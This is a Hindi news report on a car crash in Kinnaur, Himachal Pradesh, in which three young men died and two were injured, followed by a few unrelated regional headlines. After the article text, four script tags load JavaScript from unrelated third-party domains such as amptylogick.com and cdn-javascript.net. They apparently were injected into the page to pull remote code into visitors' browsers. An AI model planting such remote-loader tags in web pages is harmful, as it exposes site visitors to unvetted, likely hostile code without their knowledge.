<p>जिला किन्नौर से भी एक सड़क हादसा सामने आया है। यहां तरांडा ढांक में बीती रात कार दुर्घटनाग्रस्त हो गई। जिसमें तीन युवकों की मौत हो गई और दो युवक घायल हो गए। घायलों में एक की हालत बहुत नाजुक बताई जा रही है। इस घटना की सूचना मिलते ही पुलिस घटना स्थल पर पहुंची और घायलों को इलाज के लिए भावानगर अस्पताल में भर्ती करवाया। जहां से उन्हें प्राथमिक इलाज के बाद रामपुर अस्पताल में रेफर किया गया है। पुलिस के अनुसार कार नंबर (HP-06A–4193) में चालक समेत पांच लोग रामपुर के निरथ से कामरू एक शादी समारोह में शामिल होने जा रहे थे। लेकिन तरांडा ढांक में कई तीखे मोड़ हैं जहां उनकी कार नीचे जा गिरी।</p>
<p>मृतकों की पहचान रणबीर सिंह (21 साल) पुत्र प्रताप सिंह, गौरव (21 साल) पुत्र प्रेम चंद्र और रवि कुमार (18 साल) पुत्र राजेंद्र सिंह निवासी रामपुर, शिमला के रुप में हुई है। घायलों की पहचान साहिब पुत्र असलम खान और जावेद निवासी दिल्ली के रुप में हुई। सूचना मिलते ही पुलिस भावानगर से दुर्घटनास्थल पर पहुंची।</p>
<p>जानकारी के अनुसार जावेद सड़क के पास ही वाहन से छूट गया था, जिससे उसकी जान बच गई। पुलिस ने जावेद को दुर्घटनास्थल से जख्मी हालत में मुख्य मार्ग तक पहुंचाया। उसके बाद उसे इलाज के लिए भावानगर अस्पताल में लाया गया। अन्य चार लोगों को बादल और अंधेरा होने के कारण तलाशने में काफी मशक्कत करनी पड़ी। घटना की सूचना मिलते ही एसडीएम भावानगर मनमोहन सिंह और तहसीलदार मौके पर पहुंचे थे।</p>
<p> </p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1574930414482″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
MANDI: जेल रोड में मस्जिद में कथित अवैध निर्माण मामले में मुस्लिम पक्ष को राहत…
Mock drill at DC office : सोमवार को उपायुक्त कार्यालय परिसर में जिला आपदा प्रबंधन…
Asha Worker: आशा वर्कर्स, जो लंबे समय से ग्रामीण और शहरी क्षेत्रों में स्वास्थ्य सेवाएं…
नेशनल हाईवे नंबर तीन का निर्माण कर रही सूर्य कंस्ट्रक्शन कंपनी के खिलाफ स्थानीय ग्रामीणों…
Nahan: सिरमौर जिला मुख्यालय नाहन के माध्यमिक पाठशाला कैंट के छात्र दीक्षित वर्मा का राष्ट्रीय…
Mandi: प्रदेश की गंभीर वित्तीय स्थिति के बावजूद हिमाचल प्रदेश के मुख्यमंत्री सुखविंदर सिंह सुक्खू…